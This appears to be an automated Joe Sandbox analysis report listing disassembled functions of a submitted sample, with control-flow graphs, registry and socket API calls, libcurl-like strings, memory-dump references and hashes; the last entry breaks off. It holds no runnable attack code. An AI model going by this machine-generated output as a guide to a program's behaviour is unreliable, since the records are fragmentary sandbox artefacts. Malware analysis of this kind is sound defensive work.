                                                        Function 00519740 Relevance: 16.5, APIs: 3, Strings: 6, Instructions: 743registryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 973 519740-51975b 974 519780-519782 973->974 975 51975d-519768 call 5178a0 973->975 977 519914-51994e call 7d8b70 RegOpenKeyExA 974->977 978 519788-5197a0 call 7d8e00 call 5178a0 974->978 983 5199bb-5199c0 975->983 984 51976e-519770 975->984 986 519950-519955 977->986 987 51995a-519992 RegQueryValueExA RegCloseKey call 7d8b98 977->987 978->983 989 5197a6-5197c5 978->989 990 519a0c-519a15 983->990 988 519772-51977e 984->988 984->989 986->990 1001 519997-5199b5 call 5178a0 987->1001 988->978 996 519827-519833 989->996 997 5197c7-5197e0 989->997 1002 519835-51985c call 50e2b0 * 2 996->1002 1003 51985f-519872 call 515ca0 996->1003 999 5197e2-5197f3 call 7d8b50 997->999 1000 5197f6-519809 997->1000 999->1000 1000->996 1013 51980b-519810 1000->1013 1001->983 1001->989 1002->1003 1014 5199f0 1003->1014 1015 519878-51987d call 5177b0 1003->1015 1013->996 1018 519812-519822 1013->1018 1017 5199f5-5199fb call 515d00 1014->1017 1022 519882-519889 1015->1022 1027 5199fe-519a09 1017->1027 1018->990 1022->1017 1026 51988f-51989b call 504fe0 1022->1026 1026->1014 1031 5198a1-5198c3 call 7d8b50 call 5178a0 1026->1031 1027->990 1037 5199c2-5199ed call 50e2b0 * 2 1031->1037 1038 5198c9-5198db call 50e2d0 1031->1038 1037->1014 1038->1037 1042 5198e1-5198f0 call 50e2d0 1038->1042 1042->1037 1049 5198f6-519905 call 5163f0 1042->1049 1053 519f66-519f7f call 515d00 1049->1053 1054 51990b-51990f 1049->1054 1053->1027 1055 519a3f-519a5a call 516740 call 5163f0 1054->1055 1055->1053 1062 519a60-519a6e call 516d60 1055->1062 1065 519a70-519a94 call 516200 call 5167e0 call 516320 1062->1065 1066 519a1f-519a39 call 516840 call 5163f0 1062->1066 1077 519a16-519a19 1065->1077 1078 519a96-519ac6 call 50d120 1065->1078 1066->1053 1066->1055 1077->1066 1080 519fc1 1077->1080 1083 519ae1-519af7 call 50d190 1078->1083 1084 519ac8-519adb call 50d120 1078->1084 1082 519fc5-519ffd call 515d00 call 50e2b0 * 2 1080->1082 1082->1027 1083->1066 1092 519afd-519b09 call 504fe0 1083->1092 1084->1066 1084->1083 1092->1080 1098 519b0f-519b29 call 50e730 1092->1098 1102 519f84-519f88 1098->1102 1103 519b2f-519b3a call 5178a0 1098->1103 1106 519f95-519f99 1102->1106 1103->1102 1110 519b40-519b54 call 50e760 1103->1110 1108 519fa0-519fb6 call 50ebf0 * 2 1106->1108 1109 519f9b-519f9e 1106->1109 1120 519fb7-519fbe 1108->1120 1109->1080 1109->1108 1116 519f8a-519f92 1110->1116 1117 519b5a-519b6e call 50e730 1110->1117 1116->1106 1123 519b70-51a004 1117->1123 1124 519b8c-519b97 call 5163f0 1117->1124 1120->1080 1129 51a015-51a01d 1123->1129 1130 519c9a-519cab call 50ea00 1124->1130 1131 519b9d-519bbf call 516740 call 5163f0 1124->1131 1132 51a024-51a045 call 50ebf0 * 2 1129->1132 1133 51a01f-51a022 1129->1133 1142 519f31-519f35 1130->1142 1143 519cb1-519ccd call 50ea00 call 50e960 1130->1143 1131->1130 1150 519bc5-519bda call 516d60 1131->1150 1132->1082 1133->1082 1133->1132 1145 519f40-519f61 call 50ebf0 * 2 1142->1145 1146 519f37-519f3a 1142->1146 1161 519cfd-519d0e call 50e960 1143->1161 1162 519ccf 1143->1162 1145->1066 1146->1066 1146->1145 1150->1130 1160 519be0-519bf4 call 516200 call 5167e0 1150->1160 1160->1130 1181 519bfa-519c0b call 516320 1160->1181 1171 519d10 1161->1171 1172 519d53-519d55 1161->1172 1163 519cd1-519cec call 50e9f0 call 50e4a0 1162->1163 1182 519d47-519d51 1163->1182 1183 519cee-519cfb call 50e9d0 1163->1183 1176 519d12-519d2d call 50e9f0 call 50e4a0 1171->1176 1175 519e69-519e8e call 50ea40 call 50e440 1172->1175 1201 519e90-519e92 1175->1201 1202 519e94-519eaa call 50e3c0 1175->1202 1198 519d5a-519d6f call 50e960 1176->1198 1199 519d2f-519d3c call 50e9d0 1176->1199 1193 519c11-519c1c call 517b70 1181->1193 1194 519b75-519b86 call 50ea00 1181->1194 1188 519dca-519ddb call 50e960 1182->1188 1183->1161 1183->1163 1211 519ddd-519ddf 1188->1211 1212 519e2e-519e36 1188->1212 1193->1124 1215 519c22-519c33 call 50e960 1193->1215 1194->1124 1220 519f2d 1194->1220 1226 519d71-519d73 1198->1226 1227 519dc2 1198->1227 1199->1176 1223 519d3e-519d42 1199->1223 1208 519eb3-519ec4 call 50e9c0 1201->1208 1230 519eb0-519eb1 1202->1230 1231 51a04a-51a04c 1202->1231 1208->1066 1233 519eca-519ed0 1208->1233 1221 519e06-519e21 call 50e9f0 call 50e4a0 1211->1221 1217 519e38-519e3b 1212->1217 1218 519e3d-519e5b call 50ebf0 * 2 1212->1218 1242 519c35 1215->1242 1243 519c66-519c75 call 5178a0 1215->1243 1217->1218 1228 519e5e-519e67 1217->1228 1218->1228 1220->1142 1257 519de1-519dee call 50ec80 1221->1257 1258 519e23-519e2c call 50eac0 1221->1258 1223->1175 1238 519d9a-519db5 call 50e9f0 call 50e4a0 1226->1238 1227->1188 1228->1175 1228->1208 1230->1208 1236 51a057-51a070 call 50ebf0 * 2 1231->1236 1237 51a04e-51a051 1231->1237 1241 519ee5-519ef2 call 50e9f0 1233->1241 1236->1120 1237->1080 1237->1236 1271 519d75-519d82 call 50ec80 1238->1271 1272 519db7-519dc0 call 50eac0 1238->1272 1241->1066 1264 519ef8-519f0e call 50e440 1241->1264 1250 519c37-519c51 call 50e9f0 1242->1250 1260 51a011 1243->1260 1261 519c7b-519c8f call 50e7c0 1243->1261 1250->1124 1287 519c57-519c64 call 50e9d0 1250->1287 1275 519df1-519e04 call 50e960 1257->1275 1258->1275 1260->1129 1261->1124 1282 519c95-51a00e 1261->1282 1285 519f10-519f26 call 50e3c0 1264->1285 1286 519ed2-519edf call 50e9e0 1264->1286 1291 519d85-519d98 call 50e960 1271->1291 1272->1291 1275->1212 1275->1221 1282->1260 1285->1286 1299 519f28 1285->1299 1286->1066 1286->1241 1287->1243 1287->1250 1291->1227 1291->1238 1299->1080
                                                        APIs
                                                        • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00519946
                                                        • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 00519974
                                                        • RegCloseKey.KERNELBASE(?), ref: 0051998B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1510829214.0000000000451000.00000040.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                        • Associated: 00000000.00000002.1510808132.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.0000000000B27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.0000000000B29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511339286.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000B2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000CB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511717121.0000000000EBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511858435.000000000106F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511898886.0000000001070000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511918706.0000000001071000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511935370.0000000001072000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_450000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID: CloseOpenQueryValue
                                                        • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos
                                                        • API String ID: 3677997916-615551945
                                                        • Opcode ID: 98f93fd9c82a11b41047cee55be7ac8f1535a20e369f1583842ecaf27d052650
                                                        • Instruction ID: 36ee62e532a2e1eb38f83849232db24a1f40e52462d2dff2d38acb5bd78ae85a
                                                        • Opcode Fuzzy Hash: 98f93fd9c82a11b41047cee55be7ac8f1535a20e369f1583842ecaf27d052650
                                                        • Instruction Fuzzy Hash: 7632B6B5904202ABFB11AB24EC56A9B7EE4BF94314F184834F80997253FB31ED55C793
                                                        Function 00488B50 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 269networkCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1394 488b50-488b69 1395 488b6b-488b74 1394->1395 1396 488be6 1394->1396 1398 488beb-488bf2 1395->1398 1399 488b76-488b8d 1395->1399 1397 488be9 1396->1397 1397->1398 1400 488b8f-488ba7 call 466e40 1399->1400 1401 488bf3-488bfe call 48a550 1399->1401 1408 488cd9-488d16 SleepEx 1400->1408 1409 488bad-488baf 1400->1409 1406 488de4-488def 1401->1406 1407 488c04-488c08 1401->1407 1412 488e8c-488e95 1406->1412 1413 488df5-488e19 call 48a150 1406->1413 1410 488dbd-488dc3 1407->1410 1411 488c0e-488c1d 1407->1411 1430 488d18-488d20 1408->1430 1431 488d22 1408->1431 1414 488bb5-488bb9 1409->1414 1415 488ca6-488cb0 1409->1415 1410->1397 1418 488c1f-488c34 connect 1411->1418 1419 488c35-488c48 call 48a150 1411->1419 1416 488f00-488f06 1412->1416 1417 488e97-488e9c 1412->1417 1452 488e88 1413->1452 1453 488e1b-488e26 1413->1453 1414->1398 1422 488bbb-488bc2 1414->1422 1415->1408 1420 488cb2-488cb8 1415->1420 1416->1398 1424 488e9e-488eb6 call 462a00 1417->1424 1425 488edf-488eef call 4578b0 1417->1425 1418->1419 1451 488c4d-488c4f 1419->1451 1426 488ddc-488dde 1420->1426 1427 488cbe-488cd4 call 48b180 1420->1427 1422->1398 1429 488bc4-488bcc 1422->1429 1424->1425 1450 488eb8-488edd call 463410 * 2 1424->1450 1448 488ef2-488efc 1425->1448 1426->1397 1426->1406 1427->1406 1437 488bce-488bd2 1429->1437 1438 488bd4-488bda 1429->1438 1433 488d26-488d39 1430->1433 1431->1433 1441 488d3b-488d3d 1433->1441 1442 488d43-488d61 call 46d8c0 call 48a150 1433->1442 1437->1398 1437->1438 1438->1398 1447 488bdc-488be1 1438->1447 1441->1426 1441->1442 1471 488d66-488d74 1442->1471 1454 488dac-488db8 call 4950a0 1447->1454 1448->1416 1450->1448 1458 488c8e-488c93 1451->1458 1459 488c51-488c58 1451->1459 1452->1412 1460 488e28-488e2c 1453->1460 1461 488e2e-488e85 call 46d090 call 494fd0 1453->1461 1454->1398 1464 488dc8-488dd9 call 48b100 1458->1464 1465 488c99-488c9f 1458->1465 1459->1458 1468 488c5a-488c62 1459->1468 1460->1452 1460->1461 1461->1452 1464->1426 1465->1415 1472 488c6a-488c70 1468->1472 1473 488c64-488c68 1468->1473 1471->1398 1477 488d7a-488d81 1471->1477 1472->1458 1474 488c72-488c8b call 4950a0 1472->1474 1473->1458 1473->1472 1474->1458 1477->1398 1481 488d87-488d8f 1477->1481 1485 488d9b-488da1 1481->1485 1486 488d91-488d95 1481->1486 1485->1398 1487 488da7 1485->1487 1486->1398 1486->1485 1487->1454
                                                        APIs
                                                        • connect.WS2_32(?,?,00000001), ref: 00488C2F
                                                        • SleepEx.KERNELBASE(00000000,00000000), ref: 00488CF3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1510829214.0000000000451000.00000040.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                        • Associated: 00000000.00000002.1510808132.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.0000000000B27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.0000000000B29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511339286.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000B2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000CB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511717121.0000000000EBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511858435.000000000106F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511898886.0000000001070000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511918706.0000000001071000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511935370.0000000001072000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_450000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID: Sleepconnect
                                                        • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                                        • API String ID: 238548546-879669977
                                                        • Opcode ID: a8f2d819e697fbff3480ed97fd65d99d6423623d7010596cd114313b1f6532f2
                                                        • Instruction ID: 6af56de7c022b9e6e11ae80736ff39d4059db3d2506e4133d24f802a90c2fdb7
                                                        • Opcode Fuzzy Hash: a8f2d819e697fbff3480ed97fd65d99d6423623d7010596cd114313b1f6532f2
                                                        • Instruction Fuzzy Hash: 66B1BF70604705AFD710EF24C885BABB7E0AF81318F44892EF8598B392DB79EC55C766
                                                        Function 00452F17 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 144registryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1488 452f17-452f8c call 8d98f0 call 8d9ce0 1493 4531c9-4531cd 1488->1493 1494 452f91-452ff4 call 451619 RegOpenKeyExA 1493->1494 1495 4531d3-4531d6 1493->1495 1498 4531c5 1494->1498 1499 452ffa-45300b 1494->1499 1498->1493 1500 45315c-4531ac RegEnumKeyExA 1499->1500 1501 453010-453083 call 451619 RegOpenKeyExA 1500->1501 1502 4531b2-4531c2 1500->1502 1506 45314e-453152 1501->1506 1507 453089-4530d4 RegQueryValueExA 1501->1507 1502->1498 1506->1500 1508 4530d6-453137 call 8d9bc0 call 8d9c50 call 8d9ce0 call 8d9af0 call 8d9ce0 call 8d8050 1507->1508 1509 45313b-45314b RegCloseKey 1507->1509 1508->1509 1509->1506
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1510829214.0000000000451000.00000040.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                        • Associated: 00000000.00000002.1510808132.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.0000000000B27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.0000000000B29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511339286.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000B2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000CB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511717121.0000000000EBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511858435.000000000106F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511898886.0000000001070000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511918706.0000000001071000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511935370.0000000001072000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_450000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID: EnumOpen
                                                        • String ID: d
                                                        • API String ID: 3231578192-2564639436
                                                        • Opcode ID: 389dba9167043c7034d786ef7941c2897fde19cbe84653c8f3ce1d4972da1a72
                                                        • Instruction ID: b8d2cd7f5aea72f38e60c6607236b4c9e173eb7e06a0ea26e71a4f50dfaa50a5
                                                        • Opcode Fuzzy Hash: 389dba9167043c7034d786ef7941c2897fde19cbe84653c8f3ce1d4972da1a72
                                                        • Instruction Fuzzy Hash: 757192B49043199FDB10DF69D58479EBBF0BF84308F10896EE89897311E7749A89CF92
                                                        Function 004576A0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 73networkCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1522 4576a0-4576be 1523 4576e6-4576f2 send 1522->1523 1524 4576c0-4576c7 1522->1524 1525 4576f4-457709 call 4572a0 1523->1525 1526 45775e-457762 1523->1526 1524->1523 1527 4576c9-4576d1 1524->1527 1525->1526 1529 4576d3-4576e4 1527->1529 1530 45770b-457759 call 4572a0 call 45cb20 call 7d8c50 1527->1530 1529->1525 1530->1526
                                                        APIs
                                                        • send.WS2_32(multi.c,?,?,?,N=E,00000000,?,?,004607BF), ref: 004576EB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1510829214.0000000000451000.00000040.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                        • Associated: 00000000.00000002.1510808132.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.0000000000B27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.0000000000B29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511339286.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000B2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000CB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511717121.0000000000EBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511858435.000000000106F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511898886.0000000001070000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511918706.0000000001071000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511935370.0000000001072000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_450000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID: send
                                                        • String ID: LIMIT %s:%d %s reached memlimit$N=E$SEND %s:%d send(%lu) = %ld$multi.c$send
                                                        • API String ID: 2809346765-2851504179
                                                        • Opcode ID: 365c7c6ef27b26e465b5668ccb976e2d10a757f1af814ec8d5207aba691a91a7
                                                        • Instruction ID: d7e6be8e5e363864344db8a3a61599025bac68cea7e281afea032cb44b9c9a3c
                                                        • Opcode Fuzzy Hash: 365c7c6ef27b26e465b5668ccb976e2d10a757f1af814ec8d5207aba691a91a7
                                                        • Instruction Fuzzy Hash: F2113AB1A183047BD1209B15BC9AF2B3B9CDBC2B2CF45092DBC0527343D6699D0482B7
                                                        Function 00489290 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 146networkCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1641 489290-4892ed call 4576a0 1644 4893c3-4893ce 1641->1644 1645 4892f3-4892fb 1641->1645 1654 4893d0-4893e1 1644->1654 1655 4893e5-489427 call 46d090 call 494f40 1644->1655 1646 4893aa-4893af 1645->1646 1647 489301-489333 call 46d8c0 call 46d9a0 1645->1647 1650 4893b5-4893bc 1646->1650 1651 489456-489470 1646->1651 1665 489335-489364 WSAIoctl 1647->1665 1666 4893a7 1647->1666 1652 489429-489431 1650->1652 1653 4893be 1650->1653 1660 489439-48943f 1652->1660 1661 489433-489437 1652->1661 1653->1651 1654->1650 1657 4893e3 1654->1657 1655->1651 1655->1652 1657->1651 1660->1651 1664 489441-489453 call 4950a0 1660->1664 1661->1651 1661->1660 1664->1651 1670 48939b-4893a4 1665->1670 1671 489366-48936f 1665->1671 1666->1646 1670->1666 1671->1670 1673 489371-489390 setsockopt 1671->1673 1673->1670 1674 489392-489395 1673->1674 1674->1670
                                                        APIs
                                                        • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 0048935D
                                                        • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 00489389
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1510829214.0000000000451000.00000040.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                        • Associated: 00000000.00000002.1510808132.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.0000000000B27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.0000000000B29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511339286.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000B2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000CB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511717121.0000000000EBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511858435.000000000106F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511898886.0000000001070000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511918706.0000000001071000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511935370.0000000001072000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_450000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID: Ioctlsetsockopt
                                                        • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
                                                        • API String ID: 1903391676-2691795271
                                                        • Opcode ID: a8699b485ebe26a04d49c32c06d82223fd54cb822228907497f5e5ea21ec4b7d
                                                        • Instruction ID: 80f7ebe151046aade4f67f3aef447a44c1b25d60a4d7ff8393fcc5fb7c19a88c
                                                        • Opcode Fuzzy Hash: a8699b485ebe26a04d49c32c06d82223fd54cb822228907497f5e5ea21ec4b7d
                                                        • Instruction Fuzzy Hash: 1151D170A04705ABD711EF25C881FBA77A5FF88718F18892AFD488B382E734E951C755
                                                        Function 00457770 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 73networkCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1675 457770-45778e 1676 4577b6-4577c2 recv 1675->1676 1677 457790-457797 1675->1677 1678 4577c4-4577d9 call 4572a0 1676->1678 1679 45782e-457832 1676->1679 1677->1676 1680 457799-4577a1 1677->1680 1678->1679 1682 4577a3-4577b4 1680->1682 1683 4577db-457829 call 4572a0 call 45cb20 call 7d8c50 1680->1683 1682->1678 1683->1679
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1510829214.0000000000451000.00000040.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                        • Associated: 00000000.00000002.1510808132.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.0000000000B27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.0000000000B29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511339286.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000B2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000CB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511717121.0000000000EBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511858435.000000000106F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511898886.0000000001070000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511918706.0000000001071000.00000040.00000001.01000000.00000003.sdmpDownload File
